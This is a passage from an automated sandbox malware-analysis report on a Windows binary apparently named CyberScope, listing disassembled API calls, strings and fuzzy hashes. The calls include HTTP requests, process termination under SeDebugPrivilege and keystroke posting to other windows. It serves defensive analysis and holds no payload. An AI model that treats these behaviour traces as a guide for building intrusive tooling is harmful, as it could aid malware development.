                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                    • String ID: (&
                                                                                    • API String ID: 4072528602-1801568203
                                                                                    • Opcode ID: 41706a791d1e74091fd112c6977867e48615727aa0458ae12fd762687a84c307
                                                                                    • Instruction ID: 24400ba808dc7256d37a8043140e003a8e9fd61f7a918c30810f3fe2b11bbbea
                                                                                    • Opcode Fuzzy Hash: 41706a791d1e74091fd112c6977867e48615727aa0458ae12fd762687a84c307
                                                                                    • Instruction Fuzzy Hash: 4171B274A12226BFDB209FD4E884FBA7BB9EF09300F140459E845A7361CB35E9A5CB50
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 001974D7
                                                                                      • Part of subcall function 00197567: GetClientRect.USER32(?,?), ref: 0019758D
                                                                                      • Part of subcall function 00197567: GetWindowRect.USER32(?,?), ref: 001975CE
                                                                                      • Part of subcall function 00197567: ScreenToClient.USER32(?,?), ref: 001975F6
                                                                                    • GetDC.USER32 ref: 001D6083
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001D6096
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 001D60A4
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 001D60B9
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 001D60C1
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001D6152
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: ee6473f5df2ef487e605cd670e75207b19d6428660df47774a86d519bdf0ecb4
                                                                                    • Instruction ID: 39b596dbd7401612b334b2f000d1cd94f01d5a308765e6664ed8e9daa42d3b0c
                                                                                    • Opcode Fuzzy Hash: ee6473f5df2ef487e605cd670e75207b19d6428660df47774a86d519bdf0ecb4
                                                                                    • Instruction Fuzzy Hash: 2B71BC31500205EFCF25CFA4DC88ABA7BB5FF88320F28426AFD555A2A6C7359841DF60
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0020CCB7
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0020CCDF
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0020CD0F
                                                                                    • GetLastError.KERNEL32 ref: 0020CD67
                                                                                    • SetEvent.KERNEL32(?), ref: 0020CD7B
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0020CD86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3113390036-3916222277
                                                                                    • Opcode ID: 39840b5d8d4e16dc2d02f5b7e5e6dc4ca9852dac42ba1c17b1dbe568833d14be
                                                                                    • Instruction ID: 04323707d75a442cf521366f4a3cd204136a85199c186df410fde2826bd9f035
                                                                                    • Opcode Fuzzy Hash: 39840b5d8d4e16dc2d02f5b7e5e6dc4ca9852dac42ba1c17b1dbe568833d14be
                                                                                    • Instruction Fuzzy Hash: A13191B1520304AFD731AFA4DC88AAB7BFCEB45740B20462EF44592292D734DD199B60
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001D55AE,?,?,Bad directive syntax error,0022DCD0,00000000,00000010,?,?), ref: 001FA236
                                                                                    • LoadStringW.USER32(00000000,?,001D55AE,?), ref: 001FA23D
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001FA301
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 858772685-4153970271
                                                                                    • Opcode ID: 3f0c936558fc89bfcf2d2e8172a4d9a0665decd122c84fa5db7633ccba105f03
                                                                                    • Instruction ID: 87de90903700f7763d42d8e559c110cc88d92aa09af377e3127802d7f5c10e02
                                                                                    • Opcode Fuzzy Hash: 3f0c936558fc89bfcf2d2e8172a4d9a0665decd122c84fa5db7633ccba105f03
                                                                                    • Instruction Fuzzy Hash: 7621717194421EEFCF11AF90DC4AEFE7B79BF28300F044459F61A650A2EB759628DB11
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 001F29F8
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 001F2A0D
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001F2A9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1290815626-3381328864
                                                                                    • Opcode ID: 1bf4ccee4a9f2826fe8a164e683f22d67cea961f656f3f360448831005f2b733
                                                                                    • Instruction ID: 9c5e209e8b8625617b58e3a9dc01b8c519a8030194e9036aebb0f48684d84292
                                                                                    • Opcode Fuzzy Hash: 1bf4ccee4a9f2826fe8a164e683f22d67cea961f656f3f360448831005f2b733
                                                                                    • Instruction Fuzzy Hash: 0711297A78430BBAFA286720EC0BDF6379D8F25729B604012FA05F74D2FB71A8154918
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 0019758D
                                                                                    • GetWindowRect.USER32(?,?), ref: 001975CE
                                                                                    • ScreenToClient.USER32(?,?), ref: 001975F6
                                                                                    • GetClientRect.USER32(?,?), ref: 0019773A
                                                                                    • GetWindowRect.USER32(?,?), ref: 0019775B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                    • String ID:
                                                                                    • API String ID: 1296646539-0
                                                                                    • Opcode ID: 856b4b9b86f57ca42d115f858e4b3cdfff1df6cec1debbbcd4b949a307414253
                                                                                    • Instruction ID: 683fd4460a06f91e9391469591c3f5e8c822f5cd67f50f53f8732da969e69765
                                                                                    • Opcode Fuzzy Hash: 856b4b9b86f57ca42d115f858e4b3cdfff1df6cec1debbbcd4b949a307414253
                                                                                    • Instruction Fuzzy Hash: C2C17B7991464AEFEF14CFA8C984BEDB7F1FF08310F14841AE895A3290D734A951DB60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                    • String ID:
                                                                                    • API String ID: 1282221369-0
                                                                                    • Opcode ID: 0bdaf4b8e0fa652762b2a3c2409628ec5ce95b51058ede570a2fb650f178dae9
                                                                                    • Instruction ID: a83c87d88041b46f2d9bd3f3cb2a170a41b0e13e3de036f3aead0116b2374a18
                                                                                    • Opcode Fuzzy Hash: 0bdaf4b8e0fa652762b2a3c2409628ec5ce95b51058ede570a2fb650f178dae9
                                                                                    • Instruction Fuzzy Hash: DC6118B1904340AFDB25AFB8F885FBE7BA8AF31720F04417DE945A7281D771D8418791
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00225C24
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00225C65
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00225C6B
                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00225C6F
                                                                                      • Part of subcall function 002279F2: DeleteObject.GDI32(00000000), ref: 00227A1E
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00225CAB
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00225CB8
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00225CEB
                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00225D25
                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00225D34
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                    • String ID:
                                                                                    • API String ID: 3210457359-0
                                                                                    • Opcode ID: a7b20bf2b753188d033f1244675a28a796a741351c24ce0ffcdfeb2bbdca5903
                                                                                    • Instruction ID: 66c67a6d37ed238f4546c054caa86c8a9dca8e461a83dbeb7000d4e6125f9641
                                                                                    • Opcode Fuzzy Hash: a7b20bf2b753188d033f1244675a28a796a741351c24ce0ffcdfeb2bbdca5903
                                                                                    • Instruction Fuzzy Hash: E951C430670A39BFEF349F94EC49B987B65EB04764F20C112F5149A1E0DBB5A9A0DB40
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0020CBC7
                                                                                    • GetLastError.KERNEL32 ref: 0020CBDA
                                                                                    • SetEvent.KERNEL32(?), ref: 0020CBEE
                                                                                      • Part of subcall function 0020CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0020CCB7
                                                                                      • Part of subcall function 0020CC98: GetLastError.KERNEL32 ref: 0020CD67
                                                                                      • Part of subcall function 0020CC98: SetEvent.KERNEL32(?), ref: 0020CD7B
                                                                                      • Part of subcall function 0020CC98: InternetCloseHandle.WININET(00000000), ref: 0020CD86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 337547030-0
                                                                                    • Opcode ID: 9c19d4c5efe41462295ee67717ee330b684732a1e7a8367b765a8efb2f950d7b
                                                                                    • Instruction ID: c4540367008a5d57fb6d38c110bb5f95f6f92057563fadd5795f1e58112d5552
                                                                                    • Opcode Fuzzy Hash: 9c19d4c5efe41462295ee67717ee330b684732a1e7a8367b765a8efb2f950d7b
                                                                                    • Instruction Fuzzy Hash: F73170B1510706BFDB219FB1DD48A6BBBF8FF04304B24461EF85A86651C731D825AB60
                                                                                    APIs
                                                                                      • Part of subcall function 001F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001F43AD
                                                                                      • Part of subcall function 001F4393: GetCurrentThreadId.KERNEL32 ref: 001F43B4
                                                                                      • Part of subcall function 001F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001F2F00), ref: 001F43BB
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F2F0A
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001F2F28
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001F2F2C
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F2F36
                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001F2F4E
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001F2F52
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001F2F5C
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001F2F70
                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001F2F74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: 0d5dbc6dccf3d77649b50b727888e0eeaecf69b353a3f5b83e0e144d04e009c5
                                                                                    • Instruction ID: b30c778be5fceddfada3225d0d944113aafff0c1338cb21eaada4790e9f3db47
                                                                                    • Opcode Fuzzy Hash: 0d5dbc6dccf3d77649b50b727888e0eeaecf69b353a3f5b83e0e144d04e009c5
                                                                                    • Instruction Fuzzy Hash: 3501D8707942147BFB3067A8EC8EFA93F5AEB5DB11F100011F318AE1E0CAF154558AA9
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001F1D95,?,?,00000000), ref: 001F2159
                                                                                    • HeapAlloc.KERNEL32(00000000,?,001F1D95,?,?,00000000), ref: 001F2160
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001F1D95,?,?,00000000), ref: 001F2175
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,001F1D95,?,?,00000000), ref: 001F217D
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001F1D95,?,?,00000000), ref: 001F2180
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001F1D95,?,?,00000000), ref: 001F2190
                                                                                    • GetCurrentProcess.KERNEL32(001F1D95,00000000,?,001F1D95,?,?,00000000), ref: 001F2198
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001F1D95,?,?,00000000), ref: 001F219B
                                                                                    • CreateThread.KERNEL32(00000000,00000000,001F21C1,00000000,00000000,00000000), ref: 001F21B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: 51fdc6b7fa3473f57453efa3608d126c6e9a299b40b3a1abc7f7cd8f86771662
                                                                                    • Instruction ID: d2b70bcead7924ed19f06d9eb7b125282cccac6af05083022d0fb8c79ded891a
                                                                                    • Opcode Fuzzy Hash: 51fdc6b7fa3473f57453efa3608d126c6e9a299b40b3a1abc7f7cd8f86771662
                                                                                    • Instruction Fuzzy Hash: 4701CDB5640308BFE720AFA5EC4EF6B7BACEB88711F005411FA05DB1A1CA709811CB70
                                                                                    APIs
                                                                                      • Part of subcall function 001941EA: _wcslen.LIBCMT ref: 001941EF
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001FCF99
                                                                                    • _wcslen.LIBCMT ref: 001FCFE0
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001FD047
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001FD075
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                    • String ID: ,*&$0$<*&
                                                                                    • API String ID: 1227352736-3293349327
                                                                                    • Opcode ID: 7e9bec94ed84676d253b91b1f5bc5736a4ac464709ca8348a26d64f2310d6494
                                                                                    • Instruction ID: 63be27c0031cf6af27a08a42dd3807d86109ad8b2e923274abe46284b564da41
                                                                                    • Opcode Fuzzy Hash: 7e9bec94ed84676d253b91b1f5bc5736a4ac464709ca8348a26d64f2310d6494
                                                                                    • Instruction Fuzzy Hash: C45101716043089BD724EF28E945BBBBBEAAF95314F040A29FA91D3191DB70CD458792
                                                                                    APIs
                                                                                      • Part of subcall function 001FDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 001FDDAC
                                                                                      • Part of subcall function 001FDD87: Process32FirstW.KERNEL32(00000000,?), ref: 001FDDBA
                                                                                      • Part of subcall function 001FDD87: CloseHandle.KERNELBASE(00000000), ref: 001FDE87
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0021ABCA
                                                                                    • GetLastError.KERNEL32 ref: 0021ABDD
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0021AC10
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0021ACC5
                                                                                    • GetLastError.KERNEL32(00000000), ref: 0021ACD0
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0021AD21
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: 3b396905e5231da17ff6bec8fb80406d0ce40df4f1fc0cf4846c4ca625cf8e63
                                                                                    • Instruction ID: 5e003744b83b825b2347d0db7a39529aee5d22a36812603ba6582e5ea2f42225
                                                                                    • Opcode Fuzzy Hash: 3b396905e5231da17ff6bec8fb80406d0ce40df4f1fc0cf4846c4ca625cf8e63
                                                                                    • Instruction Fuzzy Hash: 3961D170215242AFD720DF15C485F65BBE1AF64308F14848CE45A8FBA3C771EC85CB92
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002243C1
                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002243D6
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002243F0
                                                                                    • _wcslen.LIBCMT ref: 00224435
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00224462
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00224490
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 2147712094-78025650
                                                                                    • Opcode ID: 368a5d4661c2b8fc16b44c795685d231ab5bb117d797538d47ab8c711b932a4e
                                                                                    • Instruction ID: f615de5f32d668b9203845a73b2c1554b9ca7e0b5c9f0b3da4cfed9bc77c9625
                                                                                    • Opcode Fuzzy Hash: 368a5d4661c2b8fc16b44c795685d231ab5bb117d797538d47ab8c711b932a4e
                                                                                    • Instruction Fuzzy Hash: 8541C131910329BBDF21EFA4DC49BEA7BA9FF08350F100126F944E7291D7B499A0CB90
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001FC6C4
                                                                                    • IsMenu.USER32(00000000), ref: 001FC6E4
                                                                                    • CreatePopupMenu.USER32 ref: 001FC71A
                                                                                    • GetMenuItemCount.USER32(012B5F08), ref: 001FC76B
                                                                                    • InsertMenuItemW.USER32(012B5F08,?,00000001,00000030), ref: 001FC793
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
